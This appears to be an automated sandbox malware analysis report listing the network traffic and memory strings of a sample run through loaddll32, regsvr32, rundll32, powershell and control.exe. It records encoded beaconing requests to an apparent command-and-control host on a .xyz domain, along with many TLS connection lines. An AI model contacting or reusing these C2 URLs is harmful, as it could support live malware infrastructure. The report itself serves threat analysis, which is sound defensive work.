Source: global traffic	HTTP traffic detected: GET /jdraw/hRJbHpe2NUnd/Fqb6HJaKW_2/FkOSHsbbOjgHBf/KmDpJnEWchUKTqeK6k0hw/2AQJw6Tfj2Wghg40/cDBy1qgsd1Bh7XA/8XTTdRafkqQVGKHltr/VPRzK_2FJ/vWFbmfMAYjdSfOaB_2Fb/Hhjr_2BzU1ZKuqO0buX/LCyXURXRCX4qhBBiB401RQ/MfqjvWezuBF_2/FVb574obq_/2Bf0.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jdraw/senUH03QWJY9zy0TGKst3cx/OBC4WplDXH/oqcxDz6cjN7h_2F8d/LfQkFQ_2Fy0T/FAoEVOXxiKp/e5g4BIHVUHnefb/KqKdZd97vSsTK6buJ9MPp/9jx2EzrYaeeWP1ma/erE06KdAoUvLcED/U3KE1nRYvwMMSqnPv9/1aDo6f8tR/MrfKrfcn0yaSbhv8m_2F/z2V0PdyA0_2FVLnznN3/BN9K6zV1nJnb/WmUYG.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: PHPSESSID=oj5lijodqe611lf3pm8jatk5p5; lang=en
Source: global traffic	HTTP traffic detected: GET /jdraw/nCtz8Lq6aEDL_2BsA7Qn5/Dev5sCookYywtQ9z/nG7suU6eaLynJDf/6nVlQrTedw14SsFLaP/dONDpCANh/eFyKJLQSVfXFPwoYfc_2/Fxcw2VZX7ufzKzV_2B_/2BcmZDAxHE9PqdJN_2FqrA/xpLUjN90HazXC/umw6oByt/_2BMDLnSdL9xoOnOquolygh/AYKttn5cY4/7XRs5_2FBpnYMuiL1/LLL0Aa3xG7M/waJBx6.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/P4wQs6220jnbtlIYjS/M_2BrTOFK/S5ZrWVsOjLJpN_2FedVX/CBkwP5kzII66fKYw3z_/2FjIng5PhqmFkUxpfJCyXT/oTx8Wl7oZau6V/473q3ztH/dQPwZCOMD_2BpYilPiiz4nZ/uZIwiZ0fko/kjMIGTqZ5JCk_2FS0/Gy_2FwKsvZXz/cjy_2FkTVRx/BwPtRyW55ulGu6/1jq9nBFzw/u.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/E8g7ocQa8Jp_2FkJKDIXto/jGrpKFGFm3zEl/pc9Bin_2/BMwThN1Xs8wlqXtLb7cKLtC/SgG36jLoe_/2F65aot9fOJ0PDXBC/hsoWNxn2X_2B/Y6w_2BH_2FO/I1GK6y1TlNcZL2/398IfCwmPSzVTZlSZ3ktc/prVDzQkMHshmRKXt/2UqbNyiak3Vc0V_/2FJ6G0D_2F90GG7ZcC/Q_2FC1PCI/F.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/DA9CpuaF1ChJieGGmxekNIf/_2Bf5dRFGl/6ha6ihRMMP4_2FTPW/uuFq9TAcj8h4/qSnVVL6dcdH/5B0njoQO8HRJ4A/GcUxJA_2B5IFHeGazw9j9/9KKhiR_2FNDslKNn/XvL5Nb3D7Leowhe/18j3DbadW1d4jdR2RZ/_2B6y0eTA/dUCR_2BcVc2Ddna9_2Fk/A65RCh8ja7G/kzkCTcCF/r.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9FIX_2FieCFBsfpbW1K38/dHn_2BX1vT0rKAiB/QFi0KmjZl6PH4uf/JNL9yHWEao1Jw7Ayug/0ksp4OzRe/qPXlFslPx8Je_2BMuBBh/SGrx7lyKyPKvXD05bnd/0JGzLedhoE7YtvlNRDW9VB/Smf6dY.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvKYhGzWSE_2F3JZz/aqG_2Fo0JgK7b/IpJP6WZQ/EwJ0P5ojrmoHc7KEeUKS_2F/dr_2FAQUA2/1o9m_2FVWjRUIwasm/FW5sGJpTKtUf/M_2FEcpAeM7/B8jNam9JQ5TnKP/12F_2FHiebPKRmxJQmXnR/gGjhIMF_2FS7t5KV/L.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5jTgffUh/mYJ2XVA9rwPHUy2/QjwrTGMY_2F64PN_2F/YUDgMw7p1/s2t1KKiFVgqn2ZlMG_2B/D9NyHTdv3F0qdbbbGle/lx_2BPHRlHmFCQVN9dlzs4/OJpccJSrSanUR/bzsZAfU_/2BqRTtL2elDx7sY/V.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/SeHkUEUxsMZP1AhS/3IlboRjollxufxg/k0C1fYozGaNykNILuY/7mbt1CT39/8yuLSdKM2t03HpRX2_2F/fjGqyiYIkzVmY7BL2T3/lJeut6ngXNw7Xsle3Ac_2F/uCeLuklVXJGPS/OHU0EBrz/suKxF4Ft_2BK7qPRfzoyHnN/GhDiNtOZSu/bj6BgaSC_2FhnYL1W/3sMLu_2F/RiRf.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/1n_2BflhePO/uMnCopo6qdTrYV/FWhAJA9XLeWgIwqNDciEV/Ma2pywOVrVC7gojv/E6T3hs07V6KYbye/xvW81IAf7IZHKKI_2B/RArbctFfL/2TGsfNIzn81_2FbGpeyH/ukdp1ZDGefO14nBo8EX/nrPB_2FBmNloUapimH_2FE/RWs6DX_2B2Z0G/i8D3YZuF/j1ldvh1CQhgEI/V37EE.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK38oq2QYF9z/cuTLQ3u7OqALxMIyfbyNQp/gDWpeOrsyYhNN/ao8vL_2F/3dQ2wCKcTWt3EGgjtWuBFvo/JER9x_2Bw_/2FiyK5UBn9x3lTG4i/wyJNOkM0xfPY/bTj1Bitzmn0/D5CG_2FPtjEkzq/cTayMyn_2/F.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FGsX6HBf_2FeDJF5/0Zm4ko6Y_2B7F/5nkQ7CLE/x6UrnmgoKHXkC63igNAKiIM/Lhtzb27hq2/jm8Q2hap4uiXv4gmQ/mKxqFGYK_2BR/j5HJqnO7p7O/6C_2B0biaTD1w9/N2tivlNu2ujN1Xlxq5iZI/v2iFk.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000002F.00000003.894371427.00000251C410A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000002F.00000002.937086624.00000251ABC51000.00000004.00000001.sdmp, powershell.exe, 00000034.00000002.933509067.0000015F80001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5j
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvK
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.917390433.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FG
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/potec.core.min.js
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	String found in binary or memory: https://wa.ui-portal.de/opt-out-transfer/mailcom/
Source: rundll32.exe, 00000007.00000003.846631247.00000000034EC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49871 version: TLS 1.2
